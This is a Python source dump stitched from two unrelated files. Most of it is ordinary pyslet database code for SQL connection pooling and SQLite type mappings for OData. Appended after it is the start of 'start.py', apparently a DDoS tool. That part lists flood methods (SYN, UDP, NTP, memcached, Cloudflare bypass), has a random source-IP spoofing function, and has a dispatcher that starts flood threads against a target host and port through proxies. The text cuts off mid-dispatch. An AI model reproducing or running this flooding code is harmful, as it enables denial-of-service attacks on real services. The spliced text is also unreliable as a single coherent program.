elif self.cpool_size < self.cpool_max:
# Add a new connection
cpool_item = SQLConnection()
# do the actual open outside of the cpool lock
self.cpool_size += 1
elif self.cpool_unlocked:
# take a connection that doesn't belong to us, popped at
# random
old_thread_id, cpool_item = self.cpool_unlocked.popitem()
if self.dbapi.threadsafety > 1:
logging.debug(
"Thread[%i] recycled database connection from "
"Thread[%i]", thread_id, old_thread_id)
else:
logging.debug(
"Thread[%i] closed an unused database connection "
"(max connections reached)", old_thread_id)
# is it ok to close a connection from a different
# thread? Yes: we require it!
close_flag = True
else:
now = time.time()
if timeout is not None and now > start + timeout:
logging.warn(
"Thread[%i] timed out waiting for a database "
"connection", thread_id)
break
logging.debug(
"Thread[%i] forced to wait for a database connection",
thread_id)
self.cpool_lock.wait(timeout)
logging.debug(
"Thread[%i] resuming search for database connection",
thread_id)
continue
cpool_item.locked += 1
cpool_item.thread = thread
cpool_item.thread_id = thread_id
cpool_item.last_seen = time.time()
self.cpool_locked[thread_id] = cpool_item
if cpool_item:
if close_flag:
self.close_connection(cpool_item.dbc)
cpool_item.dbc = None
if cpool_item.dbc is None:
cpool_item.dbc = self.open()
return cpool_item
# we are defeated, no database connection for the caller
# release lock on the module as there is no connection to release
self.module_lock.release()
return None
def release_connection(self, release_item):
thread_id = threading.current_thread().ident
close_flag = False
with self.cpool_lock:
# we have exclusive use of the cpool members
cpool_item = self.cpool_locked.get(thread_id, None)
if cpool_item:
if cpool_item is release_item:
self.module_lock.release()
cpool_item.locked -= 1
cpool_item.last_seen = time.time()
if not cpool_item.locked:
del self.cpool_locked[thread_id]
self.cpool_unlocked[thread_id] = cpool_item
self.cpool_lock.notify()
return
# it seems likely that some other thread is going to leave a
# locked connection now, let's try and find it to correct
# the situation
bad_thread, bad_item = None, None
for tid, cpool_item in dict_items(self.cpool_locked):
if cpool_item is release_item:
bad_thread = tid
bad_item = cpool_item
break
if bad_item is not None:
self.module_lock.release()
bad_item.locked -= 1
bad_item.last_seen = time.time()
if not bad_item.locked:
del self.cpool_locked[bad_thread]
self.cpool_unlocked[bad_item.thread_id] = bad_item
self.cpool_lock.notify()
logging.error(
"Thread[%i] released database connection originally "
"acquired by Thread[%i]", thread_id, bad_thread)
return
# this is getting frustrating, exactly which connection does
# this thread think it is trying to release?
# Check the idle pool just in case
bad_item = None
for i in range3(len(self.cpool_idle)):
cpool_item = self.cpool_idle[i]
if cpool_item is release_item:
bad_item = cpool_item
del self.cpool_idle[i]
self.cpool_size -= 1
break
if bad_item is not None:
# items in the idle pool are already unlocked
logging.error(
"Thread[%i] released a database connection from the "
"idle pool: closing for safety", thread_id)
close_flag = True
# ok, this really is an error!
logging.error(
"Thread[%i] attempted to unlock un unknown database "
"connection: %s", thread_id, repr(release_item))
if close_flag:
self.close_connection(release_item.dbc)
def connection_stats(self):
"""Return information about the connection pool
Returns a triple of:
nlocked
the number of connections in use by all threads.
nunlocked
the number of connections waiting
nidle
the number of dead connections
Connections are placed in the 'dead pool' when unexpected lock
failures occur or if they are locked and the owning thread is
detected to have terminated without releasing them."""
with self.cpool_lock:
# we have exclusive use of the cpool members
return (len(self.cpool_locked), len(self.cpool_unlocked),
len(self.cpool_idle))
def _run_pool_cleaner(self, max_idle=SQL_TIMEOUT * 10.0):
run_time = max_idle / 5.0
if run_time < 60.0:
run_time = 60.0
while not self.closing.is_set():
self.closing.wait(run_time)
self.pool_cleaner(max_idle)
def pool_cleaner(self, max_idle=SQL_TIMEOUT * 10.0):
"""Cleans up the connection pool
max_idle (float)
Optional number of seconds beyond which an idle connection
is closed. Defaults to 10 times the
:data:`SQL_TIMEOUT`."""
now = time.time()
old_time = now - max_idle
to_close = []
with self.cpool_lock:
locked_list = list(dict_values(self.cpool_locked))
for cpool_item in locked_list:
if not cpool_item.thread.isAlive():
logging.error(
"Thread[%i] failed to release database connection "
"before terminating", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
unlocked_list = list(dict_values(self.cpool_unlocked))
for cpool_item in unlocked_list:
if not cpool_item.thread.isAlive():
logging.debug(
"pool_cleaner moving database connection to idle "
"after Thread[%i] terminated",
cpool_item.thread_id)
del self.cpool_unlocked[cpool_item.thread_id]
cpool_item.thread_id = None
cpool_item.thread = None
self.cpool_idle.append(cpool_item)
elif (cpool_item.last_seen <= old_time and
self.dbapi.threadsafety <= 1):
logging.debug(
"pool_cleaner removing database connection "
"after Thread[%i] timed out",
cpool_item.thread_id)
del self.cpool_unlocked[cpool_item.thread_id]
self.cpool_size -= 1
to_close.append(cpool_item.dbc)
i = len(self.cpool_idle)
while i:
i = i - 1
cpool_item = self.cpool_idle[i]
if cpool_item.last_seen <= old_time:
logging.info("pool_cleaner removed idle connection")
to_close.append(cpool_item.dbc)
del self.cpool_idle[i]
self.cpool_size -= 1
for dbc in to_close:
if dbc is not None:
self.close_connection(dbc)
def open(self):
"""Creates and returns a new connection object.
Must be overridden by database specific implementations because
the underlying DB ABI does not provide a standard method of
connecting."""
raise NotImplementedError
def close_connection(self, connection):
"""Calls the underlying close method."""
connection.close()
def break_connection(self, connection):
"""Called when closing or cleaning up locked connections.
This method is called when the connection is locked (by a
different thread) and the caller wants to force that thread to
relinquish control.
The assumption is that the database is stuck in some lengthy
transaction and that break_connection can be used to terminate
the transaction and force an exception in the thread that
initiated it - resulting in a subsequent call to
:py:meth:`release_connection` and a state which enables this
thread to acquire the connection's lock so that it can close it.
The default implementation does nothing, which might cause the
close method to stall until the other thread relinquishes
control normally."""
pass
def close(self, timeout=5):
"""Closes this database.
This method goes through each open connection and attempts to
acquire it and then close it. The object is put into a mode
that disables :py:meth:`acquire_connection` (it returns None
from now on).
timeout
Defaults to 5 seconds. If connections are locked by other
*running* threads we wait for those threads to release them,
calling :py:meth:`break_connection` to speed up termination
if possible.
If None (not recommended!) this method will block
indefinitely until all threads properly call
:py:meth:`release_connection`.
Any locks we fail to acquire in the timeout are ignored and
the connections are left open for the python garbage
collector to dispose of."""
thread_id = threading.current_thread().ident
to_close = []
self.closing.set()
with self.cpool_lock:
nlocked = None
while True:
while self.cpool_idle:
cpool_item = self.cpool_idle.pop()
logging.error(
"Thread[%i] failed to release database connection "
"before terminating", cpool_item.thread_id)
to_close.append(cpool_item.dbc)
while self.cpool_unlocked:
unlocked_id, cpool_item = self.cpool_unlocked.popitem()
to_close.append(cpool_item.dbc)
locked_list = list(dict_values(self.cpool_locked))
for cpool_item in locked_list:
if cpool_item.thread_id == thread_id:
logging.error(
"Thread[%i] failed to release database connection "
"before closing container", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
elif not cpool_item.thread.isAlive():
logging.error(
"Thread[%i] failed to release database connection "
"before terminating", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
else:
# thread is alive, try and interrupt it if it is
# stuck in a slow query
self.break_connection(cpool_item.dbc)
if self.cpool_locked and (nlocked is None or
nlocked > len(self.cpool_locked)):
# if this is the first time around the loop, or...
# if the size of the locked pool is actually
# shrinking, wait for locked connections to be
# released
nlocked = len(self.cpool_locked)
logging.warn(
"Waiting to break unreleased database connections")
self.cpool_lock.wait(timeout)
continue
# we're not getting anywhere, force-close these
# connections
locked_list = list(dict_values(self.cpool_locked))
for cpool_item in locked_list:
logging.error(
"Thread[%i] failed to release database connection: "
"forcing it to close", cpool_item.thread_id)
del self.cpool_locked[cpool_item.thread_id]
to_close.append(cpool_item.dbc)
break
for dbc in to_close:
if dbc is not None:
self.close_connection(dbc)
def quote_identifier(self, identifier):
"""Given an *identifier* returns a safely quoted form of it.
By default we strip double quote and then use them to enclose
it. E.g., if the string 'Employee_Name' is passed then the
string '"Employee_Name"' is returned."""
return '"%s"' % identifier.replace('"', '')
def prepare_sql_type(self, simple_value, params, nullable=None):
"""Given a simple value, returns a SQL-formatted name of its type.
Used to construct CREATE TABLE queries.
simple_value
A :py:class:`pyslet.odata2.csdl.SimpleValue` instance which
should have been created from a suitable
:py:class:`pyslet.odata2.csdl.Property` definition.
params
A :py:class:`SQLParams` object. If simple_value is non-NULL, a
DEFAULT value is added as part of the type definition.
nullable
Optional Boolean that can be used to override the nullable status
of the associated property definition.
For example, if the value was created from an Int32 non-nullable
property and has value 0 then this might return the string
'INTEGER NOT NULL DEFAULT ?' with 0 being added to *params*
You should override this implementation if your database
platform requires special handling of certain datatypes. The
default mappings are given below.
================== =============================================
EDM Type SQL Equivalent
------------------ ---------------------------------------------
Edm.Binary BINARY(MaxLength) if FixedLength specified
Edm.Binary VARBINARY(MaxLength) if no FixedLength
Edm.Boolean BOOLEAN
Edm.Byte SMALLINT
Edm.DateTime TIMESTAMP
Edm.DateTimeOffset CHARACTER(27), ISO 8601 string
representation is used with micro second
precision
Edm.Decimal DECIMAL(Precision,Scale), defaults 10,0
Edm.Double FLOAT
Edm.Guid BINARY(16)
Edm.Int16 SMALLINT
Edm.Int32 INTEGER
Edm.Int64 BIGINT
Edm.SByte SMALLINT
Edm.Single REAL
Edm.String CHAR(MaxLength) or VARCHAR(MaxLength)
Edm.String NCHAR(MaxLength) or NVARCHAR(MaxLength) if
Unicode="true"
Edm.Time TIME
================== =============================================
Parameterized CREATE TABLE queries are unreliable in my
experience so the current implementation of the native
create_table methods ignore default values when calling this
method."""
p = simple_value.p_def
column_def = []
if isinstance(simple_value, edm.BinaryValue):
if p is None:
raise NotImplementedError(
"SQL binding for Edm.Binary of unbounded length: %s" %
p.name)
elif p.fixedLength:
if p.maxLength:
column_def.append("BINARY(%i)" % p.maxLength)
else:
raise edm.ModelConstraintError(
"Edm.Binary of fixed length missing max: %s" % p.name)
elif p.maxLength:
column_def.append("VARBINARY(%i)" % p.maxLength)
else:
raise NotImplementedError(
"SQL binding for Edm.Binary of unbounded length: %s" %
p.name)
elif isinstance(simple_value, edm.BooleanValue):
column_def.append("BOOLEAN")
elif isinstance(simple_value, edm.ByteValue):
column_def.append("SMALLINT")
elif isinstance(simple_value, edm.DateTimeValue):
column_def.append("TIMESTAMP")
elif isinstance(simple_value, edm.DateTimeOffsetValue):
# stored as string and parsed e.g. 20131209T100159.000000+0100
# need to check the precision and that in to the mix
column_def.append("CHARACTER(27)")
elif isinstance(simple_value, edm.DecimalValue):
if p.precision is None:
precision = 10 # chosen to allow 32-bit integer precision
else:
precision = p.precision
if p.scale is None:
scale = 0 # from the CSDL model specification
else:
scale = p.scale
column_def.append("DECIMAL(%i,%i)" % (precision, scale))
elif isinstance(simple_value, edm.DoubleValue):
column_def.append("FLOAT")
elif isinstance(simple_value, edm.GuidValue):
column_def.append("BINARY(16)")
elif isinstance(simple_value, edm.Int16Value):
column_def.append("SMALLINT")
elif isinstance(simple_value, edm.Int32Value):
column_def.append("INTEGER")
elif isinstance(simple_value, edm.Int64Value):
column_def.append("BIGINT")
elif isinstance(simple_value, edm.SByteValue):
column_def.append("SMALLINT")
elif isinstance(simple_value, edm.SingleValue):
column_def.append("REAL")
elif isinstance(simple_value, edm.StringValue):
if p.unicode is None or p.unicode:
n = "N"
else:
n = ""
if p.fixedLength:
if p.maxLength:
column_def.append("%sCHAR(%i)" % (n, p.maxLength))
else:
raise edm.ModelConstraintError(
"Edm.String of fixed length missing max: %s" % p.name)
elif p.maxLength:
column_def.append("%sVARCHAR(%i)" % (n, p.maxLength))
else:
raise NotImplementedError(
"SQL binding for Edm.String of unbounded length: %s" %
p.name)
elif isinstance(simple_value, edm.TimeValue):
column_def.append("TIME")
else:
raise NotImplementedError("SQL type for %s" % p.type)
if ((nullable is not None and not nullable) or
(nullable is None and p is not None and not p.nullable)):
column_def.append(' NOT NULL')
if simple_value:
# Format the default
column_def.append(' DEFAULT ')
column_def.append(
params.add_param(self.prepare_sql_value(simple_value)))
return ''.join(column_def)
def prepare_sql_value(self, simple_value):
"""Returns a python object suitable for passing as a parameter
simple_value
A :py:class:`pyslet.odata2.csdl.SimpleValue` instance.
You should override this method if your database requires
special handling of parameter values. The default
implementation performs the following conversions
================== =======================================
EDM Type Python value added as parameter
------------------ ---------------------------------------
NULL None
Edm.Binary (byte) string
Edm.Boolean True or False
Edm.Byte int
Edm.DateTime Timestamp instance from DB API module
Edm.DateTimeOffset string (ISO 8601 basic format)
Edm.Decimal Decimal instance
Edm.Double float
Edm.Guid (byte) string
Edm.Int16 int
Edm.Int32 int
Edm.Int64 long
Edm.SByte int
Edm.Single float
Edm.String (unicode) string
Edm.Time Time instance from DB API module
================== =======================================
"""
if not simple_value:
return None
elif isinstance(simple_value, (
edm.BooleanValue,
edm.BinaryValue,
edm.ByteValue,
edm.DecimalValue,
edm.DoubleValue,
edm.Int16Value,
edm.Int32Value,
edm.Int64Value,
edm.SByteValue,
edm.SingleValue,
edm.StringValue
)):
return simple_value.value
elif isinstance(simple_value, edm.DateTimeValue):
microseconds, seconds = math.modf(simple_value.value.time.second)
return self.dbapi.Timestamp(
simple_value.value.date.century *
100 + simple_value.value.date.year,
simple_value.value.date.month,
simple_value.value.date.day,
simple_value.value.time.hour,
simple_value.value.time.minute,
int(seconds), int(1000000.0 * microseconds + 0.5))
elif isinstance(simple_value, edm.DateTimeOffsetValue):
return simple_value.value.get_calendar_string(
basic=True, ndp=6, dp=".").ljust(27, ' ')
elif isinstance(simple_value, edm.GuidValue):
return simple_value.value.bytes
elif isinstance(simple_value, edm.TimeValue):
return self.dbapi.Time(
simple_value.value.hour,
simple_value.value.minute,
simple_value.value.second)
else:
raise NotImplementedError(
"SQL type for " + simple_value.__class__.__name__)
def read_sql_value(self, simple_value, new_value):
"""Updates *simple_value* from *new_value*.
simple_value
A :py:class:`pyslet.odata2.csdl.SimpleValue` instance.
new_value
A value returned by the underlying DB API, e.g., from a cursor
fetch operation
This method performs the reverse transformation to
:py:meth:`prepare_sql_value` and may need to be overridden to
convert *new_value* into a form suitable for passing to the
underlying
:py:meth:`~pyslet.odata2.csdl.SimpleValue.set_from_value`
method."""
if new_value is None:
simple_value.set_null()
elif isinstance(simple_value, (edm.DateTimeOffsetValue)):
# we stored these as strings
simple_value.set_from_value(
iso.TimePoint.from_str(new_value, tdesignators="T "))
else:
simple_value.set_from_value(new_value)
def new_from_sql_value(self, sql_value):
"""Returns a new simple value with value *sql_value*
The return value is a :py:class:`pyslet.odata2.csdl.SimpleValue`
instance.
sql_value
A value returned by the underlying DB API, e.g., from a
cursor fetch operation
This method creates a new instance, selecting the most
appropriate type to represent sql_value. By default
:py:meth:`pyslet.odata2.csdl.EDMValue.from_value`
is used.
You may need to override this method to identify the appropriate
value type."""
return edm.EDMValue.from_value(sql_value)
def select_limit_clause(self, skip, top):
"""Returns a SELECT modifier to limit a query
See :meth:`limit_clause` for details of the parameters.
Returns a tuple of:
skip
0 if the modifier implements this functionality. If it does
not implement this function then the value passed in for
skip *must* be returned.
modifier
A string modifier to insert immediately after the SELECT
statement (must be empty or end with a space).
For example, if your database supports the TOP keyword you might
return::
(skip, 'TOP %i' % top)
This will result in queries such as::
SELECT TOP 10 FROM ....
More modern syntax tends to use a special limit clause at the
end of the query, rather than a SELECT modifier. The default
implementation returns::
(skip, '')
...essentially doing nothing."""
return (skip, '')
def limit_clause(self, skip, top):
"""Returns a limit clause to limit a query
skip
An integer number of entities to skip
top
An integer number of entities to limit the result set of a
query or None is no limit is desired.
Returns a tuple of:
skip
0 if the limit clause implements this functionality. If it
does not implement this function then the value passed in
for skip *must* be returned.
clause
A limit clause to append to the query. Must be empty or end
with a space.
For example, if your database supports the MySQL-style LIMIT and
OFFSET keywords you would return (for non-None values of top)::
(0, 'LIMIT %i OFFSET %i' % (top, skip))
This will result in queries such as::
SELECT * FROM Customers LIMIT 10 OFFSET 20
More modern syntax tends to use a special limit clause at the
end of the query, rather than a SELECT modifier. Such as::
(skip, 'FETCH FIRST %i ROWS ONLY ' % top)
This syntax is part of SQL 2008 standard but is not widely
adopted and, for compatibility with existing external database
implementation, the default implementation remains blank."""
return (skip, '')
class SQLiteEntityContainer(SQLEntityContainer):
"""Creates a container that represents a SQLite database.
Additional keyword arguments:
file_path
The path to the SQLite database file.
sqlite_options
A dictionary of additional options to pass as named arguments to
the connect method. It defaults to an empty dictionary, you
won't normally need to pass additional options and you shouldn't
change the isolation_level as the collection classes have been
designed to work in the default mode. Also, check_same_thread
is forced to False, this is poorly documented but we only do it
so that we can close a connection in a different thread from the
one that opened it when cleaning up.
For more information see sqlite3_
.. _sqlite3: https://docs.python.org/2/library/sqlite3.html
All other keyword arguments required to initialise the base class
must be passed on construction except *dbapi* which is automatically
set to the Python sqlite3 module."""
def __init__(self, file_path, sqlite_options={}, **kwargs):
if is_text(file_path) and file_path == ":memory:":
if (('max_connections' in kwargs and
kwargs['max_connections'] != 1) or
'max_connections' not in kwargs):
logging.warn("Forcing max_connections=1 for in-memory "
"SQLite database")
kwargs['max_connections'] = 1
self.sqlite_memdbc = sqlite3.connect(
":memory:", check_same_thread=False, **sqlite_options)
else:
self.sqlite_memdbc = None
super(SQLiteEntityContainer, self).__init__(dbapi=sqlite3, **kwargs)
if (not isinstance(file_path, OSFilePath) and not is_text(file_path)):
raise TypeError("SQLiteDB requires an OS file path")
self.file_path = file_path
self.sqlite_options = sqlite_options
def get_collection_class(self):
"""Overridden to return :py:class:`SQLiteEntityCollection`"""
return SQLiteEntityCollection
def get_symmetric_navigation_class(self):
"""Overridden to return :py:class:`SQLiteAssociationCollection`"""
return SQLiteAssociationCollection
def get_fk_class(self):
"""Overridden to return :py:class:`SQLiteForeignKeyCollection`"""
return SQLiteForeignKeyCollection
def get_rk_class(self):
"""Overridden to return :py:class:`SQLiteReverseKeyCollection`"""
return SQLiteReverseKeyCollection
def open(self):
"""Calls the underlying connect method.
Passes the file_path used to construct the container as the only
parameter. You can pass the string ':memory:' to create an
in-memory database.
Other connection arguments are not currently supported, you can
derive a more complex implementation by overriding this method
and (optionally) the __init__ method to pass in values for ."""
if self.sqlite_memdbc is not None:
return self.sqlite_memdbc
dbc = self.dbapi.connect(str(self.file_path), check_same_thread=False,
**self.sqlite_options)
c = dbc.cursor()
c.execute("PRAGMA foreign_keys = ON")
c.close()
return dbc
def break_connection(self, connection):
"""Calls the underlying interrupt method."""
connection.interrupt()
def close_connection(self, connection):
"""Calls the underlying close method."""
if self.sqlite_memdbc is None:
connection.close()
def close(self):
super(SQLiteEntityContainer, self).close()
# close any in-memory database
if self.sqlite_memdbc is not None:
self.sqlite_memdbc.close()
def prepare_sql_type(self, simple_value, params, nullable=None):
"""Performs SQLite custom mappings
================== ===================================
EDM Type SQLite Equivalent
------------------ -----------------------------------
Edm.Binary BLOB
Edm.Decimal TEXT
Edm.Guid BLOB
Edm.String TEXT
Edm.Time REAL
Edm.Int64 INTEGER
================== ===================================
The remainder of the type mappings use the defaults from the
parent class."""
p = simple_value.p_def
column_def = []
if isinstance(simple_value, (edm.StringValue, edm.DecimalValue)):
column_def.append("TEXT")
elif isinstance(simple_value, (edm.BinaryValue, edm.GuidValue)):
column_def.append("BLOB")
elif isinstance(simple_value, edm.TimeValue):
column_def.append("REAL")
elif isinstance(simple_value, edm.Int64Value):
column_def.append("INTEGER")
else:
return super(
SQLiteEntityContainer,
self).prepare_sql_type(
simple_value,
params,
nullable)
if ((nullable is not None and not nullable) or
(nullable is None and p is not None and not p.nullable)):
column_def.append(' NOT NULL')
if simple_value:
# Format the default
column_def.append(' DEFAULT ')
column_def.append(
params.add_param(self.prepare_sql_value(simple_value)))
return ''.join(column_def)
def prepare_sql_value(self, simple_value):
"""Returns a python value suitable for passing as a parameter.
We inherit most of the value mappings but the following types
have custom mappings.
================== ==============================================
EDM Type Python value added as parameter
------------------ ----------------------------------------------
Edm.Binary buffer object
Edm.Decimal string representation obtained with str()
Edm.Guid buffer object containing bytes representation
Edm.Time value of
:py:meth:`pyslet.iso8601.Time.get_total_seconds`
================== ==============================================
Our use of buffer type is not ideal as it generates warning when
Python is run with the -3 flag (to check for Python 3
compatibility) but it seems unavoidable at the current time."""
if not simple_value:
return None
elif isinstance(simple_value, edm.BinaryValue):
return buffer2(simple_value.value)
elif isinstance(simple_value, edm.DecimalValue):
return str(simple_value.value)
elif isinstance(simple_value, edm.GuidValue):
return buffer2(simple_value.value.bytes)
elif isinstance(simple_value, edm.TimeValue):
return simple_value.value.get_total_seconds()
else:
return super(
SQLiteEntityContainer,
self).prepare_sql_value(simple_value)
def read_sql_value(self, simple_value, new_value):
"""Reverses the transformation performed by prepare_sql_value"""
if new_value is None:
simple_value.set_null()
elif isinstance(new_value, buffer2):
new_value = bytes(new_value)
simple_value.set_from_value(new_value)
elif isinstance(simple_value,
(edm.DateTimeValue, edm.DateTimeOffsetValue)):
# SQLite stores these as strings
simple_value.set_from_value(
iso.TimePoint.from_str(new_value, tdesignators="T "))
elif isinstance(simple_value, edm.TimeValue):
simple_value.value = iso.Time(total_seconds=new_value)
elif isinstance(simple_value, edm.DecimalValue):
simple_value.value = decimal.Decimal(new_value)
else:
simple_value.set_from_value(new_value)
def new_from_sql_value(self, sql_value):
"""Returns a new simple value instance initialised from *sql_value*
Overridden to ensure that buffer objects returned by the
underlying DB API are converted to strings. Otherwise
*sql_value* is passed directly to the parent."""
if isinstance(sql_value, buffer2):
result = edm.BinaryValue()
result.set_from_value(bytes(sql_value))
return result
else:
return super(SQLiteEntityContainer, self).new_from_sql_value(
sql_value)
def limit_clause(self, skip, top):
clause = []
if top:
clause.append('LIMIT %i ' % top)
if skip:
clause.append('OFFSET %i ' % skip)
skip = 0
return skip, ''.join(clause)
class SQLiteEntityCollectionBase(SQLCollectionBase):
"""Base class for SQLite SQL custom mappings.
This class provides some SQLite specific mappings for certain
functions to improve compatibility with the OData expression
language."""
def sql_expression_length(self, expression, params, context):
"""Converts the length method: maps to length( op[0] )"""
query = ["length("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(")")
return ''.join(query) # don't bother with brackets!
def sql_expression_year(self, expression, params, context):
"""Converts the year method
maps to CAST(strftime('%Y',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%Y',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_month(self, expression, params, context):
"""Converts the month method
maps to CAST(strftime('%m',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%m',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_day(self, expression, params, context):
"""Converts the day method
maps to CAST(strftime('%d',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%d',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_hour(self, expression, params, context):
"""Converts the hour method
maps to CAST(strftime('%H',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%H',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_minute(self, expression, params, context):
"""Converts the minute method
maps to CAST(strftime('%M',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%M',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_second(self, expression, params, context):
"""Converts the second method
maps to CAST(strftime('%S',op[0]) AS INTEGER)"""
query = ["CAST(strftime('%S',"]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(") AS INTEGER)")
return ''.join(query) # don't bother with brackets!
def sql_expression_tolower(self, expression, params, context):
"""Converts the tolower method
maps to lower(op[0])"""
query = ["lower("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(")")
return ''.join(query) # don't bother with brackets!
def sql_expression_toupper(self, expression, params, context):
"""Converts the toupper method
maps to upper(op[0])"""
query = ["upper("]
query.append(self.sql_expression(expression.operands[0], params, ','))
query.append(")")
return ''.join(query) # don't bother with brackets!
class SQLiteEntityCollection(SQLiteEntityCollectionBase, SQLEntityCollection):
"""SQLite-specific collection for entity sets"""
def where_last(self, entity, params):
"""In SQLite all tables have a ROWID concept"""
return ' WHERE ROWID = last_insert_rowid()'
class SQLiteAssociationCollection(
SQLiteEntityCollectionBase,
SQLAssociationCollection):
"""SQLite-specific collection for symmetric association sets"""
pass
class SQLiteForeignKeyCollection(
SQLiteEntityCollectionBase,
SQLForeignKeyCollection):
"""SQLite-specific collection for navigation from a foreign key"""
pass
class SQLiteReverseKeyCollection(
SQLiteEntityCollectionBase,
SQLReverseKeyCollection):
"""SQLite-specific collection for navigation to a foreign key"""
pass
class SQLiteStreamStore(blockstore.StreamStore):
"""A stream store backed by a SQLite database.
file_path
The path to the SQLite database file.
dpath
The optional directory path to the file system to use for
storing the blocks of data. If dpath is None then the blocks are
stored in the SQLite database itself."""
def load_container(self):
"""Loads and returns a default entity container
The return value is a
:py:class:`pyslet.odata2.csdl.EntityContainer` instance with
an EntitySets called 'Blocks', 'Locks' and 'Streams' that are
suitable for passing to the constructors of
:py:class:`pyslet.blockstore.BlockStore`,
:py:class:`pyslet.blockstore.LockStore` and
:py:class:`pyslet.blockstore.StreamStore`
respectively."""
doc = edmx.Document()
with io.open(os.path.join(os.path.dirname(__file__),
'streamstore.xml'), 'rb') as f:
doc.read(f)
return doc.root.DataServices['StreamStoreSchema.Container']
def __init__(self, file_path, dpath=None):
self.container_def = self.load_container()
if isinstance(file_path, OSFilePath):
file_path = str(file_path)
create = not os.path.exists(file_path)
self.container = SQLiteEntityContainer(file_path=file_path,
container=self.container_def)
if create:
self.container.create_all_tables()
if dpath is None:
bs = blockstore.FileBlockStore(dpath)
else:
bs = blockstore.EDMBlockStore(
entity_set=self.container_def['Blocks'])
ls = blockstore.LockStore(entity_set=self.container_def['Locks'])
blockstore.StreamStore.__init__(
self, bs, ls, self.container_def['Streams'])
|
start.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
l7 = ["CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "OSTRESS", "DYN", "SLOW", "HEAD", "HIT", "NULL", "COOKIE", "BRUST", "PPS", "EVEN", "GSB", "DGB", "AVB"]
l4 = ["TCP", "UDP", "SYN", "VSE", "MEM", "NTP"]
l3 = ["POD", "ICMP"]
to = ["CFIP", "DNS", "PING", "CHECK", "DSTAT", "INFO"]
ot = ["STOP", "TOOLS", "HELP"]
methods = l7 + l4 + l3
methodsl = l7 + l4 + l3 + to + ot
try:
import os
except:
print("system error!")
exit()
def clear_screen():
if (os.name == "nt"):
os.system('cls')
else:
os.system('clear')
def spoofer():
addr = [192, 168, 0, 1]
d = '.'
addr[0] = str(random.randrange(11, 197))
addr[1] = str(random.randrange(0, 255))
addr[2] = str(random.randrange(0, 255))
addr[3] = str(random.randrange(2, 254))
assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3]
return assemebled
def start_attack(method, threads, event, socks_type):
global out_file
# layer7
cmethod = str(method.upper())
if (cmethod != "HIT") and (cmethod not in l4) and (cmethod not in l3) and (cmethod != "OSTRESS"):
out_file = str("files/proxys/" + sys.argv[5])
proxydl(out_file, socks_type)
print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums)))
else:
print("{} Attack Started To {}:{} For {} Seconds".format(method, target, port, sys.argv[7]))
try:
if method == "post":
for _ in range(threads):
threading.Thread(target=post, args=(event, socks_type), daemon=True).start()
elif method == "brust":
for _ in range(threads):
threading.Thread(target=brust, args=(event, socks_type), daemon=True).start()
elif method == "get":
for _ in range(threads):
threading.Thread(target=http, args=(event, socks_type), daemon=True).start()
elif method == "pps":
for _ in range(threads):
threading.Thread(target=pps, args=(event, socks_type), daemon=True).start()
elif method == "even":
for _ in range(threads):
threading.Thread(target=even, args=(event, socks_type), daemon=True).start()
elif method == "ovh":
for _ in range(threads):
threading.Thread(target=ovh, args=(event, socks_type), daemon=True).start()
elif method == "capb":
for _ in range(threads):
threading.Thread(target=capb, args=(event, socks_type), daemon=True).start()
elif method == "cookie":
for _ in range(threads):
threading.Thread(target=cookie, args=(event, socks_type), daemon=True).start()
elif method == "tor":
for _ in range(threads):
threading.Thread(target=tor, args=(event, socks_type), daemon=True).start()
elif method == "bypass":
for _ in range(threads):
threading.Thread(target=bypass, args=(event, socks_type), daemon=True).start()
elif method == "head":
for _ in range(threads):
threading.Thread(target=head, args=(event, socks_type), daemon=True).start()
elif method == "stress":
for _ in range(threads):
threading.Thread(target=stress, args=(event, socks_type), daemon=True).start()
elif method == "ostress":
for _ in range(threads):
threading.Thread(target=ostress, args=(event, socks_type), daemon=True).start()
elif method == "null":
for _ in range(threads):
threading.Thread(target=null, args=(event, socks_type), daemon=True).start()
elif method == "cfb":
for _ in range(threads):
threading.Thread(target=cfb, args=(event, socks_type), daemon=True).start()
elif method == "avb":
for _ in range(threads):
threading.Thread(target=AVB, args=(event, socks_type), daemon=True).start()
elif method == "gsb":
for _ in range(threads):
threading.Thread(target=gsb, args=(event, socks_type), daemon=True).start()
elif method == "dgb":
for _ in range(threads):
threading.Thread(target=dgb, args=(event, socks_type), daemon=True).start()
elif method == "dyn":
for _ in range(threads):
threading.Thread(target=dyn, args=(event, socks_type), daemon=True).start()
elif method == "hit":
for _ in range(threads):
threading.Thread(target=hit, args=(event, timer), daemon=True).start()
# layer4
elif method == "vse":
for _ in range(threads):
threading.Thread(target=vse, args=(event, timer), daemon=True).start()
elif method == "udp":
for _ in range(threads):
threading.Thread(target=udp, args=(event, timer), daemon=True).start()
elif method == "tcp":
for _ in range(threads):
threading.Thread(target=tcp, args=(event, timer), daemon=True).start()
elif method == "syn":
for _ in range(threads):
threading.Thread(target=syn, args=(event, timer), daemon=True).start()
elif method == "mem":
